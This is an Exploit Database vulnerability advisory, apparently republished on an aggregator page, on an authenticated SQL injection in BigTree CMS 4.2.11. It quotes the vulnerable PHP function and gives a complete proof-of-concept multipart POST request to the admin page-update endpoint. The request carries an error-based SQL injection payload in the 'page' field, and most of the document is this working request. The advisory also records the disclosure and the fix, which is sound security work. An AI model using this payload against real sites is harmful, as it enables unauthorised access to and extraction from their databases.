BigTree CMS 4.2.11 – SQL Injection

• Exploit Database
• 23 阅读

• 作者： Mehmet Ince
  日期： 2016-06-27
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/40024/

• 1. ADVISORY INFORMATION
  ========================================
  Title: BigTree CMS <= 4.2.11 Authenticated SQL Injection Vulnerability
  Application: BigTree CMS
  Remotely Exploitable: Yes
  Versions Affected: < 4.2.11
  Vendor URL: https://www.bigtreecms.org
  Bugs:SQL Injection
  Author: Mehmet Ince
  Date of found: 27 Jun 2016
  
  
  2. CREDIT
  ========================================
  Those vulnerabilities was identified during external penetration test
  by Mehmet INCE from PRODAFT / INVICTUS.
  
  Netsparker was used for initial detection.
  
  3. DETAILS
  ========================================
  
  Following codes shows $page variable is used at inside SQL query without
  proper escaping nor PDO.
  
  File : /core/inc/bigtree/admin.php
  
  Lines 6866 - 6879
  
  function submitPageChange($page,$changes) {
  if ($page[0] == "p") {
  // It's still pending...
  $type = "NEW";
  $pending = true;
  $existing_page = array();
  $existing_pending_change = array("id" => substr($page,1));
  } else {
  // It's an existing page
  $type = "EDIT";
  $pending = false;
  $existing_page = BigTreeCMS::getPage($page);
  $existing_pending_change = sqlfetch(sqlquery("SELECT id FROM
  bigtree_pending_changes WHERE `table` = 'bigtree_pages' AND item_id =
  '$page'"));
  }
  ...
  }
  
  
  Basically submitPageChange function is vulnerable against SQL Injection
  vulnerability. This function was used twice during development. Following
  list shows location of these function callers.
  
  /core/admin/modules/pages/front-end-update.php
  /core/admin/modules/pages/update.php
  
  
  PoC:
  
  Following HTTP POST request was used in order to exploit the SQL Injection
  flaw.
  
  POST /site/index.php/admin/pages/update/ HTTP/1.1
  Cache-Control: no-cache
  Referer: http://10.0.0.154/site/index.php/admin/pages/edit/2/
  Accept:
  text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML,
  like Gecko) Chrome/41.0.2272.16 Safari/537.36
  Accept-Language: en-us,en;q=0.5
  X-Scanner: Netsparker
  Cookie: PHPSESSID=amsscser3eg7fkljpjjt78ki17; hide_bigtree_bar=;
  bigtree_admin[email]=mehmet%40mehmetince.net;
  bigtree_admin[login]=%5B%22session-5770eca81c6d86.91986415%22%2C%22chain-5770ec71e2d7d3.28696204%22%5D;
  PHPSESSID=lsrbe949jc3na5j1sof19a3s53
  Host: 10.0.0.154
  Accept-Encoding: gzip, deflate
  Content-Length: 2248
  Content-Type: multipart/form-data; boundary=b788b047b8e345b792cdc1f81fef2106
  
  --b788b047b8e345b792cdc1f81fef2106
  Content-Disposition: form-data; name="MAX_FILE_SIZE"
  
  2097152
  --b788b047b8e345b792cdc1f81fef2106
  Content-Disposition: form-data; name="_bigtree_post_check"
  
  success
  --b788b047b8e345b792cdc1f81fef2106
  Content-Disposition: form-data; name="page"
  
  -1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT
  COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x
  FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
  --b788b047b8e345b792cdc1f81fef2106
  Content-Disposition: form-data; name="nav_title"
  
  The Trees
  --b788b047b8e345b792cdc1f81fef2106
  Content-Disposition: form-data; name="title"
  
  The Trees
  --b788b047b8e345b792cdc1f81fef2106
  Content-Disposition: form-data; name="publish_at"
  
  
  --b788b047b8e345b792cdc1f81fef2106
  Content-Disposition: form-data; name="expire_at"
  
  
  --b788b047b8e345b792cdc1f81fef2106
  Content-Disposition: form-data; name="in_nav"
  
  
  --b788b047b8e345b792cdc1f81fef2106
  Content-Disposition: form-data; name="redirect_lower"
  
  
  --b788b047b8e345b792cdc1f81fef2106
  Content-Disposition: form-data; name="trunk"
  
  
  --b788b047b8e345b792cdc1f81fef2106
  Content-Disposition: form-data; name="external"
  
  
  --b788b047b8e345b792cdc1f81fef2106
  Content-Disposition: form-data; name="new_window"
  
  Yes
  --b788b047b8e345b792cdc1f81fef2106
  Content-Disposition: form-data; name="resources[page_header]"
  
  The Trees
  --b788b047b8e345b792cdc1f81fef2106
  Content-Disposition: form-data; name="tag_entry"
  
  
  --b788b047b8e345b792cdc1f81fef2106
  Content-Disposition: form-data; name="route"
  
  trees
  --b788b047b8e345b792cdc1f81fef2106
  Content-Disposition: form-data; name="seo_invisible"
  
  
  --b788b047b8e345b792cdc1f81fef2106
  Content-Disposition: form-data; name="ptype"
  
  Save
  --b788b047b8e345b792cdc1f81fef2106
  Content-Disposition: form-data; name="max_age"
  
  3
  --b788b047b8e345b792cdc1f81fef2106
  Content-Disposition: form-data; name="template"
  
  
  --b788b047b8e345b792cdc1f81fef2106
  Content-Disposition: form-data; name="meta_keywords"
  
  
  --b788b047b8e345b792cdc1f81fef2106
  Content-Disposition: form-data; name="meta_description"
  
  
  --b788b047b8e345b792cdc1f81fef2106--
  
  
  4. TIMELINE
  ========================================
  27 Jun 2016 - Netsparker identified SQL Injection.
  27 Jun 2016 - Source code review and finding root cause of SQLi.
  27 Jun 2016 - Issue resolved by PRODAFT / INVICTUS team.
  27 Jun 2016 - Pull Request has been sended.
  
  https://github.com/bigtreecms/BigTree-CMS/pull/256
  
  -- 
  Sr. Information Security Engineer
  https://www.mehmetince.net